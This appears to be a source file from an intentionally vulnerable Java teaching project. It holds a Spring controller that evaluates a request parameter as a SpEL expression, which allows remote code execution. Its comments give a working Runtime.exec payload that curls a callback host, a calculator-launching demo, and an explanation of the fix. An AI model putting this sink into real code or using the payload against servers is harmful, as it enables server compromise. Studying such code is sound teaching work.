package org.joychou.controller;
import org.springframework.expression.EvaluationContext;
import org.springframework.expression.ExpressionParser;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;
/**
* SpEL Injection
*
* @author JoyChou @2019-01-17
*/
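@RestController
public class SpEL {

    /**
     * SPEL to RCE: intentionally vulnerable endpoint that evaluates the
     * {@code expression} request parameter as a Spring Expression Language
     * (SpEL) expression and returns the result as text.
     *
     * <p>http://localhost:8080/spel/vul/?expression=xxx.
     * xxx is urlencode(exp)
     * exp: T(java.lang.Runtime).getRuntime().exec("curl xxx.ceye.io")
     *
     * <p>Why this is exploitable: {@code getValue()} is called without an
     * {@code EvaluationContext}, so Spring falls back to its default
     * {@code StandardEvaluationContext}. That context resolves type references
     * ({@code T(...)}), constructors and arbitrary method calls, which turns a
     * caller-controlled expression into code execution inside the server JVM.
     *
     * <p>Fix: do not evaluate request-supplied expressions. If expression
     * evaluation is a requirement, pass a restricted context to
     * {@code getValue(context)}, e.g.
     * {@code SimpleEvaluationContext.forReadOnlyDataBinding().build()}, which
     * does not support type references or constructor calls.
     *
     * <p>Review hint: any data flow from a request parameter into
     * {@code ExpressionParser.parseExpression(...)} is worth flagging in code
     * review and static analysis.
     *
     * @param expression SpEL source text taken directly from the HTTP request (untrusted)
     * @return string form of the evaluation result; {@code "null"} when the
     *         expression evaluates to {@code null}
     */
    @RequestMapping("/spel/vul")
    private static String rce(String expression) {
        ExpressionParser parser = new SpelExpressionParser();
        // SECURITY (intentional, not fixed here): untrusted input is evaluated under the
        // default StandardEvaluationContext. fix method: SimpleEvaluationContext
        Object value = parser.parseExpression(expression).getValue();
        // getValue() returns null for expressions such as "null"; String.valueOf avoids
        // the NullPointerException that calling toString() on the result would raise.
        return String.valueOf(value);
    }

    /**
     * Local demonstration of the same sink with a hard-coded expression: the
     * parser is fed a fixed string rather than request data, showing that
     * evaluation alone is enough to start an OS process.
     *
     * @param args unused
     */
    public static void main(String[] args) {
        ExpressionParser parser = new SpelExpressionParser();
        String expression = "T(java.lang.Runtime).getRuntime().exec(\"open -a Calculator\")";
        // The evaluation result is not needed; the side effect happens during getValue().
        parser.parseExpression(expression).getValue();
    }
}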